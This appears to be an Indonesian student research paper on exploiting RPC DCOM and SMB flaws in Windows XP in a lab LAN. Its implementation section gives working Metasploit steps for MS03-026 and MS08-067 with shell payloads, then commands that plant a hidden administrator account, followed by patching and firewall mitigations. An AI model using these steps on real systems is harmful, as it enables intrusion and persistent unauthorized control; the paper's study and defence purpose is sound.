Eksploitasi Keamanan Sistem Operasi Windows - Journal

advertisement
Eksploitasi Keamanan Sistem Operasi Windows XP
Pada Jaringan LAN
NASKAH PUBLIKASI
Disusun Oleh :
ASADU RAHMATIKA ROCHIM
04.11.0511
JURUSAN TEKNIK INFORMATIKA
SEKOLAH TINGGI MANAJEMEN INFORMATIKA DAN KOMPUTER
“AMIKOM“
YOGYAKARTA
2010
1
2
ABSTRACT
On the network (network) there are various kinds of protocols that each have
unique functions. One of them is the protocol Remote Procedure Call (RPC). This
protocol provides an inter-process communication mechanism that allows a
program to run on a computer without a felt any code execution on a remote
system (remote system). In this protocol there are also other functions such as
protocol message, RPC features, etc.. Each of these functions are contained in
three layers of RPC is the highest layer, middle, and lowest. Each layer in contact
with different parts of the operating system. RPC protocol implementation
includes a more complex sectors, ranging from port mapping, the language used
in the RPC programming and how it works. In addition to discussing the RPC
protocol, in this study will be discussed on the exploitation RPC protocol on
Windows XP and RPC protocol is one of intruders in Windows XP operating
system Exploitation is the misuse is the original function of this protocol for other
activities which harm nature diremote parties and make the system the
information contained therein is not safe.
Keywords:
Remote
Procedure
Call,
Exploitation,Information
Systems,
VCVCVCVOperating Systems
3
PENDAHULUAN
1.1 Latar Belakang Masalah.
Windows XP merupakan salah satu sistem operasi yang banyak digunakan
dengan salah satu keunggulannya yaitu User-Friendly. Dibalik keunggulan
tersebut, integritas sistem operasi untuk berjalan pada aplikasi jaringan jauh
tertinggal dibandingkan sistem operasi lainnya seperti Linux atau Unix. Salah satu
kelemahan sistem operasi ini yang banyak digunakan para penyusup adalah
protokol RPC ( Remote Procedure Call ).
Serangan celah keamanan RPC Dcom yang pernah populer di tahun 2003
terjadi pada tanggal 12 Agustus 2003 dimana dimanfaatkan dengan sangat baik
oleh worm Lovsan atau lebih dikenal dengan nama Blaster dan variannya
menyebabkan semua komputer Windows NT / 2000 / XP / 2003 saling melakukan
scanning untuk menyebarkan dirinya dan sempat menggegerkan jagad internet.
Eksploitasi celah keamanan RPC Dcom kemudain kembali muncul di tahun 2004
-2005 dimana trend yang terjadi adalah satu malware yang memiliki kemampuan
mengeksploitasi berbagai celah keamanan dan terkadang satu malware
mengeksploitasi belasan celah keamanan. Setelah serangan tersebut mereda,
kelihatannya di akhir tahun 2008 ini kembali muncul peluang eksploitasi baru atas
celah keamanan RPC Dcom lagi dan kali ini cukup serius karena Windows XP
dengan Service Pack 3 sekalipun tetap rentan terhadap eksploitasi celah keamanan
RPC Dcom baru ini.
4
2. Subjek Penelitian
Subjek penelitian adalah pengujian operating sistem yang direncanakan
untuk pembelajaran dan mengetahui celah kelemahan pada sistem tersebut.
Pengujian ini dilakukan dengan tiga buah komputer yang saling dikoneksikan satu
sama lain dalam satu jaringan local (LAN). Dan selanjutnya yang perlu
diperhatikan dari penelitian tersebut bagaimana teknik melakukan penyusupan ke
dalam komputer lain dan bagaimana pencegahannya agar tidak terjadi serangan
atau dapat dikendalikan oleh user lain. Sehingga komputer kita aman dari para
penyusup.
2.1 Perangkat Lunak.
Perangkat lunak yang digunakan dalm penelitian ini adalah sistem operasi
WINDOWS XP Service Pack 1,2 dan 3, serta aplikasi sebagai tools untuk
melakukan eksploitasi yaitu Metasploit 3.
Metasploit.
Gambar 3.2 Metasploit
Metasploit Framework adalah sebuah platform pengembangan untuk
membuat tool keamanan dan exploit. Metasploit Framework terdiri dari tools,
libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework
5
adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan
modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil,
payload akan tereksekusi pada sistem target dan pengguna akan disediakan
sebuah shell untuk berinteraksi dengan payload.
Metasploit berjalan pada berbagai operating sistem, termasuk Linux,
Windows, Mac OS X, dan sebagian besar dari BSD. Metasploit telah digunakan
pada berbagai macam platform hardware, dari Unix mainframe sampai ke iPhone.
3. Analisis Sistem.
3.1 Anlisis Kinerja Sistem Pada Jaringan.
Berdasarkan topologi jaringan yang ada, maka dalam penelitian ini
penggunaan topologi star yang telah dibuat tidak mengalami gangguan pada
pertukaran jalur data dari satu kompter ke komputer yang lain atau dengan kata
lain kinerja jaringan serta sistem dalam pertukaran data berfungsi dengan baik,
dikarenakan computer yang terhubung dalam jaringan berjumlah 3 buah atau
jaringan kecil.
3.2 Analisis Kelemahan Sistem.
Kelemahan RPC pada Sistem Operasi Windows.
Sistem operasi Microsoft Windows XP adalah salah satu sistem operasi yang
mendukung protokol RPC.
Kelemahan protokol RPC pada sistem operasi ini terletak pada fungsi RPC
yang berhubungan dengan pertukaran message melalui protokol TCP/IP. Hal ini
mempengaruhi bagian antar-muka Distributed Component Object Model (DCOM)
yang berhubungan dengan RPC, yang akan mendengarkan ( listen ) port-port RPC
6
yang tersedia. DCOM adalah protokol yang berfungsi untuk mengaktifkan
komponen pada perangkat lunak ( software ) agar dapat berkomunikasi langsung
dengan jaringan. Protokol ini didesain untuk penggunaan jaringan multi tranport
termasuk protokol Internet misalnya HTTP.
Kecenderungan lain berpindah pada nomor port lain yang dapat digunakan
untuk mengirim pesan tertentu yang telah dimanipulasi, seperti port 135, 139,
445, 593 pada remote komputer. Melalui port-port ini maka seorang user dapat
melakukan permintaan yang dapat mengekploitasi dengan menjalankan kode
dengan hak sistem lokal. Berikut ini tabel protokol yang sering dimanfaatkan pada
ekploitasi RPC.
Tabel 3.1 Port dan Protokol yang umum dieksploitasi
Urutan Protokol yang digunakan oleh
Port TCP atau UDP
Endpoint Mapper
ncacn ip tcp
TCP/135
ncacn ip udp
UDP/135
ncacn np pipe emapper
TCP/139 dan TCP/445
ncacn http
TCP/593
ncacn http dengan servis COM Internet aktif
TCP/180
Analisis PIECES Sistem.
Dari pemaparan tersebut maka penulis anlisa dengan metode PIECES (
Performance, Information, Economic, Control, Efficiency, Service ). Sebagai
berikut:
7
1. Analisis Kinerja (Performance Analysis)
Sistem windows XP yang lama memiliki kelemahan pada sistem RPC
sehingga akan berdampak dalam kinerja sistem. Kinerja tersebut akan
tergangguan ketika seorang penyusup telah mampu mengeksplotasi sistem.
Gangguan kinerja sistem bergantung dari kegiatan yang dilakukan oleh penyusup,
namun jika penyusup sedang tidak melakukan kegiatan terhadap komputer yang
tereksploitasi maka gangguan terhadap sstem tidak berpengaruh.
2 . Analisis Informasi (Information Analysis)
Sistem lama tidak mampu memberikan keamanan informasi, karena infomasi
yang ada pada sistem lama ketika sistem tereksploitasi maka seorang penyusup
dapat melakukan tidakan apapun terhadap informasi yang ada pada sistem.dan
dapat menghambat informasi pada sistem ketika diakses oleh penyusup.
3.
Analisis Ekonomi (Economy Analysis)
Secara ekonomi sistem lama yang telah berjalan pada saat ini membutuhkan
biaya yang sangat besar ketika sistem telah tereksploitasi oleh penyusup.
Kemungkinan terjadi adalah adanya kerusakan sistem dan pengambilan data-data
yang ada pada sistem lama. jika itu terjadi maka sistem harus di instal ulang dan
data yang telah diambil oleh penyusup kemungkinan akan hilang dan jika data itu
benar-benar hilang maka dilakukan pencarian data ulang.
4.
Analisis Pengendalian (Control Analysis)
8
Pada sistem yang sudah ada, pengendalian dapat dilakukan oleh user lain
sepenuhnya tanpa adanya memperdulikan status hak acces sistem. Hal inilah yang
menjadi penyebab utama kelemahan pada sistem lama.
5.
Analisis Efisiensi (Efficiency Analysis)
Sistem lama yang berjalan belum sepenuhnya efesien, mengingat ketika
sistem itu tereksploitasi maka sistem akan dikendalikan oleh penyusup sistem dan
ketika penyusup menghilangkan hak acces terhadap sistem dan mengambil data
yang ada. maka pemilik sistem akan melakukan install ulang sistem dan membuat
data-data ulang yang telah diambil oleh penyusup. Hal ini akan membutuhkan
biaya waktu dan sumberdaya yang menyebabkan tidak ke-efisienan.
6.
Analisis Pelayanan (Service Analysis)
Pelayanan informasi yang dihasilkan oleh sistem lama belum dapat
memenuhi kebutuhan informasi yang diperlukan oleh pemilik sistem. Kelemahan
pada servis RPCSS pada sistem lama adalah penyebab utama dari pelayan sistem.
3.3Stategi Pemecahan Masalah..
Dari analisa permasalahan diatas penulis menggaris bawahi bahwa
permasalahan utama pada sistem lama windows XP adalah tingkat kelemahan
pada port 135,445, dll seperti pada tabel 2.1 diatas.
Untuk itu strategi pemecahan masalah yang penulis lakukan adalah \
kelemahan pada sistem lama dalam hal ini port-port yang terkait dengan sumber
permasalahan akan ditutup atau dapat juga dilakukan pemfilteran dengan firewall
atau sejenisnya. Adapun pembahsan mengenai hal tersebut akan disampaikan
pada bab berikutnya. Sedangkan topologi jaringan tetap menggunakan topologi
9
yang lama dikarenakan kebutuhan akan jaringan masih dalam tingkat kecil. Jika
pada jaringan yang lebih luas atau besarpun penulis menyarankan menggunakan
topologi Star walaupun dari segi instalasi akan memerlukan banyak pengkabelan,
tetapi dari segi penggunaan jika salah satu node putus maka node yang lain masih
tetap berjalan.
4. Implementasi Eksploitasi RPC.
Eksploitasi disini yaitu dengan melakukan penyusupan ke sistem operasi
Microsoft Windows XP SP1, Windows XP SP2, dan Windows XP SP3.
4.1 Eksploitasi Menggunakan Program.
Pada implemenatasi ekplotasi ini penulis akan menguji sistem operasi
Windows XP.
Pengujian Windows XP SP1
Sebelum melakukan pengujian lebih jauh. Kita akan melakukan pengujian
koneksi ke komputer yang akan kita serang dalam hal ini komputer2 dengan no IP
address 192.168.0.2 . Pengujian tes koneksi dapat dilakukan dengan mengetikkan
script “ ping 192.168.0.2 “ pada Command Prompt seperti tampak pada gambar
di bawah ini.
10
Gambar 4.4 akses command prompt komputer2 di komputer1
Pada gambar diatas tampak pengkoneksian telah berhasil dengan keterangan
terdapat 4 paket data terkirim 0% lost ke no IP 192.168.0.2. Kemudian pada tahap
selanjutanya kita aktifkan program Metasploit dan kita pilih Menu Console.
Setelah itu kita akan melihat berbagai macam exsploit yang ada pada
Metasploit dengan perintah :
msf > show exploits
dan sebagian dari list seluruh exploit yang ada kira-kira seperti dibawah ini :
Exploits
========
Name
Description
-----
----
----------------
windows/dcerpc/ms03_026_dcom
Microsoft RPC DCOM Interface Overflow
windows/dcerpc/ms05_017_msmq
Microsoft Message Queueing Service Path
Overflow
Selanjutnya penulis menggunakan exsploit windows /dcerpc/ ms03_026_dcom
untuk menyerang komputer2.
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) >
Selanjutnya kita perlu set terlebih dahulu RHOST dari komputer target dengan
mengetikkan :
msf exploit(ms03_026_dcom) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini
memang mengeksploitasi vulnerability di port 135. Untuk exploit target diisi
11
dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang
berarti automatic target.
msf exploit(ms03_026_dcom) > set HOST 0
HOST => 0
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini
menggunakan tcp_bind_shell (akses command prompt di kompi target) :
msf exploit(ms03_026_dcom) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
untuk melihat payload apa saja dalam Metasploit kita gunakan perintah :
msf exploit(ms03_026_dcom) > show payloads
Selanjutnya kita jalankan exploit :
msf exploit(ms03_026_dcom) > exploit
Gambar 4.6 hasil proses dan exploitasi
Dari hasil diatas, kita telah berhasil masuk ke komputer target dalam hal ini
komputer2 dan kita telah mengakses Command Prompt komputer2. selanjutnya
12
kita akan coba melihat IP Configurasi pada komputer2 dengan cara ketik perintah
ipconfig
C:\WINDOWS\sistem32> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\WINDOWS\sistem32>
Pengujian pada Windows
Untuk pengujian pada Windows
XP SP2 ini penulis telah melakukan
percobaan dengan metode yang sama namun tidak dapat menembus target yang
kali ini adalah komputer3 dengan no IP Address 192.168.0.3. hasil dari percobaan
pada windows XP SP2 ini sebagai berikut:
Test konekesi ke komputer3
Gambar 4.7 tes koneksi komputer ke komputer3
Gambar 4.7 hasil test koneksi ke komputer3.
Kemudian penulis mencoba menyerang dengan metode yang sama juga
namun berbeda eksploit yang akan kita gunakan untuk penyerangan. Percobaan
13
kali ini menggunakan eksploit
windows /smb/ms08_067_netapi
eksploit ini bekerja
untuk melumpuhkan NetAPI32.dll pada windows XP SP1,2 dan 3.
Hasil percobaan
Msf > show exploits
Exploits
========
Name
Description
----
--nwapi32.dll
windows /smb/ms06_066_nwwks
Microsoft Services MS06-066 nwwks.dll
windows /smb/ms08_067_netapi
Microsoft Server Service Relative
Path Stack Corruption
msf > use windows /smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > show payloads
generic/shell_reverse_tcp
Generic Command Shell, Reverse TCP
Inlinen
Selanjutnya kita set payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set HOST 0
HOST => 0
Sekarang kita jalankan exploitnya
msf exploit(ms08_067_netapi) > exploit
dan hasilnya :
host => 0
>> exploit
[*]
[*]
[*]
[*]
[*]
Started bind handler
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:English
Selected Target: Windows XP SP2 English (NX)
Triggering the vulnerability...
14
[*] Command shell session 1 opened (192.168.0.1:1794 -> 192.168.0.3:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS \sistem32>
Dari gambar diatas kita telah masuk ke sistem komputer3. dan sekali lagi
terdapat celah yang bisa kita masuki pada sistem operasi windows xp SP2 dan SP3
4.2 Eksekusi Kode.
Tahap ini merupakan tahap eksekusi kode yang diinginkan. Pada tahap ini
komputer1 dapat melakukan melakukan apa saja. Pada contoh kasus ini akan
dicoba untuk membuat sebuah account baru dengan hak seorang Administrator.
Eksekusi kode pembuatan user baru ini pada setiap operating sistem yang kita
eksploitasi menggunakan metode yang sama.
Setelah masuk pada sistem komputer2, terlebih dahulu kita lihat siapa saja
yang memiliki hak login di komputer2 caranya ketik perintah net
user.
C:\WINDOWS\sistem32>net user
Dan hasilnya sebagai berikut :
Gambar 4.10 account user pada sistem
15
Selanjutanya kita gunakan perintah berikut untuk mengeksekusi pembuatan user
baru dengan password 123 :
net user asadu2 123 /add
dan kita lihat hak user baru tadi dengan perintah:
net user asadu2
kita lihat hasilnya
Gambar 4.12 info account user baru pada sistem
Dari gambar diatas dapat kita ketahui hak user asadu2 masih sebagai user
biasa atau tidak dapat melakukan pengendalian terhadap sistem secara penuh.
Untuk itu hak user ini kita diubah menjadi hak Administrator dengan cara ketik
perintah :
16
net localgroup Administrators asadu2 /add
dan untuk melihat hasil pengubahan hak menjadi administrator ketik pertintah :
net user asadu2
Dengan demikian pada pada komputer2 akan didapatkan satu user baru
bernama ”asadu2” dengan hak seorang administrator.
Implementasi ini dapat dilakukan untuk tujuan baik, misalnya pada kasus
hilangnya password seorang user yang memiliki hak sebagai Administrator.
Namun pada dasarnya hal ini sendiri adalah kelemahan utama didalam sistem
keamanan pada sistem operasi.
Selain pembuatan user baru, eksekusi kode yang dapat dilakukan lainnya
antara lain upload atau download data dari dan ke komputer2, perusakan sistem,
dll.
4.3 Pencegahan Eksploitasi RPC
Berikut ini adalah beberapa cara yang dapat digunakan untuk melakukan hal
ini ( dikutip dari buletin keamanan Microsoft MS03-026 dan buletin keamanan
Microsoft MS08-067):
1. Memblokir port 135, 137, 138 dan 445 pada UDP dan port 135, 149, 445,
dan 593 pada TCP melalui Firewall. Disfungsikan COM Internet Services
( CIS ) dan RPC melalui HTTP yang menggunakan port 80 dan 443
terutama pada jaringan remote yang menggunakan VPN ( Virtual Private
Network ) atau sejenisnya.
2. Gunakan personal Firewall seperti Internet Connection Firewall.
3. Blokir semua port sering diekploitasi dengan menggunakan filter IPSEC.
4. Disfungsikan fitur DCOM pada setiap komputer atau server. Disable
17
DCOM on all affected machines
5. Khusus Sistem operasi buatan Microsoft, selalu update security Patch
untuk meningkatkan keamanan sistem operasi tersebut.
Dampak dari pemblokiran tersebut adalah diblokirnya file sharing yang ada
pada sistem dan ketika komputer terkoneksi jaringan maka akan sangat
merugikan. Namun agar sistem dapat bekerja secara optimal, sebaiknya dan
disarankan untuk mengupdate sistem dengan mempatch kesalahan pada sistem
tersebut ke Microsoft.
Formatted: Bullets and Numbering
5. 1 Kesimpulan
Dari implementasi yang telah dilakukan dapat diambil kesimpulan sebagai
berikut:
1. Terdapat celah pada remote procedure call system Operasi Windows XP
2. Dampak yang terjadi dari kelemahan tersebut user yang tidak diinginkan
dapat mengambil alih system.
3. Sesungguhnya tidak ada sistem yang seratus persen aman dari kebocoran
dan kelemahan. Yang ada adalah sistem yang belum teruji keamanannya.
5.2 Saran
Sebagai seorang pemilik komputer personal atau seorang administrator
sudah seyogyanya untuk terus menerus mengambil tindakan preventif agar sistem
yang dijaganya tetap stabil dan terhindar dari kelemahan yang bisa dimanfaatkan
orang lain. Tindakan tersebut dapat berupa:
1. mengupdate sistem secara keseluruhan ke vendor pembuatnya.
2. memasang software anti virus dan mengupdatenya setiap waktu
18
terkadang banyak orang yang tidak bertanggung jawab melakukan
eksploitasi sistem dengan menggunakan metode yang sudah pernah di lakukan
sebelumnya, untuk itu jika kita seorang administrator jaringan hendaknya tetap
mempelajari metode eksploitasi baik yang telah lampau di gunakan ataupun yang
baru, sehingga sistem kita tidak mudah tereksplotasi dan jika tereksploitasipun
kita sudah tahu cara penangananya
Daftar Pustaka
Pangera Ali Abbas, Ariyus Doni, 2005, “Sistem Operasi”, Penerbit Andi,
Yogyakarta.
Tanembaum S Andrew., 1996,“ Jaringan Komputer Edisi Bahasa Indonesia Jilid
1”, Pearson Education Asia Pte.ltd,Prentice-Hall Inc.
Oetomo Dharma Sutedjo Budi. Dkk, 2006,”Konsep & Aplikasi Pemrograman
Client-Server dan Sistem Terdistribusi”, Penerbit Andi, Yogyakarta.
Syahfrizal Melwin, 2005, “Pengantar Jaringan Komputer”, Penerbit Andi,
Yogyakarta.
Outlines Schaum’s, 2004, “ Computer Networking ”, Penerbit Erlangga, Jakarta.
Marki
Tommy,
2003,”
Keamanan
System
Informasi
RPC“,
http://www.cert.or.id/~budi/courses/security/2006/tommy_report.pdf, diakses
tgl 15 September 2009.
www.metasploit.com, diakses tanggal 2 September 2009.
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx,
diakses
tanggal 24 November 2009.
19
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx, diakses
tanggal 24 November 2009.
20
Download